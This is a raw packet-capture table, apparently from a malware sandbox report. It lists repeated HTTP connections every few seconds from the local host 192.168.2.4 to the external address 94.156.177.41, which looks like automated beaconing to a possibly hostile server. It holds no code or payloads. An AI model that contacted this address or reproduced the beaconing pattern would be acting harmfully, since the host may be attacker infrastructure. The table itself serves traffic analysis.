Dec 4, 2024 06:52:10.235538006 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:10.295397043 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.356156111 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.356364012 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:10.358481884 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:10.478563070 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.478754044 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:10.598934889 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:11.901484966 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:11.901515007 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:11.901578903 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:11.901618958 CET	49739	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:12.021641970 CET	80	49739	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:12.052459955 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:12.173185110 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:12.173410892 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:12.175564051 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:12.295530081 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:12.295748949 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:12.415819883 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:13.773469925 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:13.773525000 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:13.773577929 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:13.773622990 CET	49740	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:13.893779039 CET	80	49740	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:13.920792103 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:14.040909052 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:14.041134119 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:14.043212891 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:14.163228989 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:14.164338112 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:14.284452915 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.532588005 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.532768965 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:15.533066988 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.533166885 CET	49741	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:15.652893066 CET	80	49741	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.694436073 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:15.814461946 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.814549923 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:15.818129063 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:15.938199043 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:15.938258886 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:16.058465958 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.218137980 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.218159914 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.218225956 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.218324900 CET	49743	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.338561058 CET	80	49743	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.415494919 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.535598040 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.535711050 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.537750006 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.657744884 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:17.657826900 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:17.777792931 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.025707006 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.025800943 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.025824070 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.025851965 CET	49746	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.145796061 CET	80	49746	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.161326885 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.281306982 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.283354044 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.285294056 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.405179977 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:19.405358076 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:19.525259972 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:20.880343914 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:20.880603075 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:20.880675077 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:20.882543087 CET	49750	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:21.002459049 CET	80	49750	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:21.018975973 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:21.138971090 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:21.139070988 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:21.141326904 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:21.262100935 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:21.262165070 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:21.382390022 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:22.682821035 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:22.683064938 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:22.683187008 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:22.685194016 CET	49752	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:22.805214882 CET	80	49752	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:22.830600023 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:22.950743914 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:22.951064110 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:22.952970982 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:23.072956085 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:23.073188066 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:23.193212986 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.551582098 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.551615953 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.551832914 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:24.551832914 CET	49754	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:24.671843052 CET	80	49754	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.690256119 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:24.810169935 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.810378075 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:24.812109947 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:24.932044983 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:24.932097912 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:25.052181005 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.402652979 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.402679920 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.403487921 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.403487921 CET	49756	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.523526907 CET	80	49756	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.551208973 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.671286106 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.671422005 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.673463106 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.793507099 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:26.793786049 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:26.913836956 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.258573055 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.258603096 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.258701086 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.258701086 CET	49757	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.378824949 CET	80	49757	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.395833969 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.515897036 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.515983105 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.517987013 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.638139009 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:28.638241053 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:28.758470058 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.177768946 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.177786112 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.177926064 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.177984953 CET	49759	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.298016071 CET	80	49759	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.323266029 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.443294048 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.443377018 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.445363045 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.565306902 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:30.565483093 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:30.685517073 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.085510969 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.085673094 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.085851908 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:32.094065905 CET	49761	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:32.214744091 CET	80	49761	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.649805069 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:32.769834995 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.769912958 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:32.772286892 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:32.892219067 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:32.892280102 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:33.012454033 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.340843916 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.340930939 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.341106892 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.341156006 CET	49762	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.460892916 CET	80	49762	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.492723942 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.612765074 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.612874031 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.614860058 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.734860897 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:34.734954119 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:34.854918003 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.018158913 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.018234015 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.018357992 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.018635035 CET	49764	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.138566971 CET	80	49764	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.164129972 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.284075022 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.284189939 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.287272930 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.408047915 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:36.409349918 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:36.530024052 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:37.879709959 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:37.879797935 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:37.879905939 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:37.893222094 CET	49766	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:38.013205051 CET	80	49766	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:38.103513956 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:38.223879099 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:38.223974943 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:38.227730036 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:38.347717047 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:38.347814083 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:38.467822075 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:39.817699909 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:39.817816019 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:39.817895889 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:39.817943096 CET	49767	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:39.937958956 CET	80	49767	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:39.955773115 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:40.075944901 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:40.076030016 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:40.077786922 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:40.197741032 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:40.197879076 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:40.317974091 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:41.706990957 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:41.707154989 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:41.707223892 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:41.707273006 CET	49768	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:41.827200890 CET	80	49768	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:41.846352100 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:41.966331959 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:41.966433048 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:41.968180895 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:42.088063955 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:42.088176966 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:42.208141088 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:43.607929945 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:43.607947111 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:43.608001947 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:43.610594988 CET	49769	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:43.730470896 CET	80	49769	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:43.826524019 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:43.946542978 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:43.946865082 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:43.954031944 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:44.073952913 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:44.074153900 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:44.194308043 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.535087109 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.535109997 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.535212040 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:45.535253048 CET	49770	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:45.655215979 CET	80	49770	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.681427956 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:45.801685095 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.803577900 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:45.805480957 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:45.925508022 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:45.927567005 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:46.047624111 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.435343027 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.435417891 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.435569048 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.435596943 CET	49771	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.555547953 CET	80	49771	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.586464882 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.706475973 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.706661940 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.708317995 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.828212976 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:47.828392982 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:47.948287010 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.348959923 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.349004030 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.349050999 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.349081039 CET	49772	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.469197989 CET	80	49772	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.537405968 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.657367945 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.657480001 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.659935951 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.779880047 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:49.779958963 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:49.899945021 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.250996113 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.251019001 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.251091003 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.251091003 CET	49773	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.371174097 CET	80	49773	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.393459082 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.513492107 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.513681889 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.515549898 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.635601997 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:51.635755062 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:51.756563902 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:52.949302912 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:52.949374914 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:52.949423075 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:52.951447010 CET	49774	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:53.071413994 CET	80	49774	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:53.102349043 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:53.222512960 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:53.222605944 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:53.224378109 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:53.344413996 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:53.344477892 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:53.464498997 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:54.623199940 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:54.623219967 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:54.623291969 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:54.623326063 CET	49775	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:54.743376017 CET	80	49775	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:54.767545938 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:54.887584925 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:54.887703896 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:54.889772892 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:55.009635925 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:55.009702921 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:55.129791021 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.524264097 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.524399042 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.524406910 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:56.524460077 CET	49776	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:56.644483089 CET	80	49776	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.658569098 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:56.778561115 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.778630018 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:56.780823946 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:56.900819063 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:56.900865078 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:57.020823956 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.371764898 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.372042894 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.372095108 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.378451109 CET	49778	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.498302937 CET	80	49778	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.519797087 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.639764071 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.639864922 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.641870022 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.761795998 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:58.761872053 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:58.882090092 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.231060028 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.231091976 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.231152058 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.231225014 CET	49780	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.351212978 CET	80	49780	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.377794981 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.497833014 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.498038054 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.499943018 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.619843960 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:00.620038986 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:00.740015030 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.093612909 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.093648911 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.093707085 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:02.093739033 CET	49786	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:02.213689089 CET	80	49786	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.234369993 CET	49792	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:02.354394913 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.354530096 CET	49792	80	192.168.2.4	94.156.177.41
